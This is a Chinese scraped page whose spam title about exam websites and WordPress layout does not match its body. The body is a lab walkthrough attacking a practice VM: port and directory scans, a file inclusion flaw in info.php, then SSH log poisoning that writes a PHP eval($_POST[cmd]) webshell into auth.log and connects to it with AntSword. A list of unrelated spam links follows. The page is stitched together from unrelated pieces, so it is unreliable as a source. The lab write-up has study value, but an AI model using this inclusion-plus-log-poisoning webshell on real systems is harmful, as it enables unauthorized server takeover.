当前位置: 首页 > news >正文

考试网站怎么做的wordpress不居中

考试网站怎么做的,wordpress不居中,广告设计培训班有用吗,南山区住房和建设局网站官网一、导入靶机 将下载好的靶机拖入到VMware中#xff0c;填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集 1、主机发现 用御剑扫描工具扫描虚拟机的NAT网段#xff0c;发现靶机的IP是192.168.204.141 2、端口扫描 用御剑端口扫描扫描全…一、导入靶机 将下载好的靶机拖入到VMware中填写靶机机名称(随便起一个)和路径 虚拟机设置里修改网络状态为NAT模式 二、信息收集 1、主机发现 用御剑扫描工具扫描虚拟机的NAT网段发现靶机的IP是192.168.204.141 2、端口扫描 用御剑端口扫描扫描全端口 发现21、2211、80、25、1100和8888端口开启 3、访问Web服务 网页上访问192.168.204.141出现一个大特码头 访问192.168.47.129:8888弹出一个登录框 4、目录扫描 使用kali的dirb进行目录扫描dirb http://192.168.204.141/ 扫描结果如下 访问antibot_image目录 发现有一个info.php文件 点开发现是一个PHP的探针文件 查看info.php的网页源码发现存在文件包含漏洞 三、漏洞利用 在URL后面输入 ?image/etc/passwd 用image参数传入想要获取的文件路径 成功显示说明存在文件包含漏洞 前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的所以使用kali命令扫描nmap -A 192.168.204.141 -p- 扫描出来2211是ssh远程连接端口 此时我们报错连接 2211 ssh ?php eval($_POST[cmd]);?192.168.204.141 -p 2211 然后在网页端查看ubuntu报错信息/var/log/auth.log /var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录还是通过 sudo 执行命令都会在 auth.log 中产生记录。 该目录下发现多了一些报错信息木马大概率写入成功 使用蚁剑进行连接上传了一句话木马的路径 http://192.168.204.141/antibot_image/antibots/info.php?image/var/log/auth.log 连接密码是刚刚POST传入的cmd 成功登陆到靶机
http://www.hkea.cn/news/14285025/

相关文章:

  • 网站参考页面设计网络营销的分类
  • 推荐网站建设服务话术网站建设的经费预算报告
  • 全国各大网站开发免费app
  • p2p做网站百度本地推广
  • 响应式设计的网站docker实际企业解决方案
  • 建设品牌网站自己的网站怎么赚钱
  • 网站后台添加投票系统汽车4s店网站建设方案
  • 做网站可行性分析做网站需要买多大空间
  • 企业网站有哪些功能北京vi设计公司广州标志设计
  • 百度四川建设厅网站百度搜索排名购买
  • 东营网站建设推广公司网站被百度收录吗
  • 网站建设哪家最好用wordpress自定义布局
  • 做家具有那个网站好手机百度怎么翻译网页
  • 杭州精品课程网站建设用asp做的大型网站
  • 酒店网站建设的基本内容建设网站要求
  • 网站树状型结构优化彩票网站搭建
  • 四川专业网站建设公司移动端原型
  • 百度免费网站申请现在开天猫店需要多少钱
  • 做电力 公司网站那间公司做网站好
  • 棋牌网站代理北京网站优化合作
  • 网站内容一样影响收录淘宝客网站应该怎么做
  • 代刷网站只做软件下载网站开发协议范本
  • 承德建设网站wordpress+discuz+seo
  • 浙江金顶建设公司网站会员卡管理系统怎么开通
  • 怎么做教育网站做网站关键词要懂代码么
  • 易语言如何做网站中信建设有限责任公司ppp项目管理部
  • 网站现状如何分析拉新app推广平台排名
  • 网站建设工作室wp主题模板抓取网站后台密码
  • 福永网站推广网站重新建设的通知
  • 廊坊网站建设公司网站建设流程包括哪些内容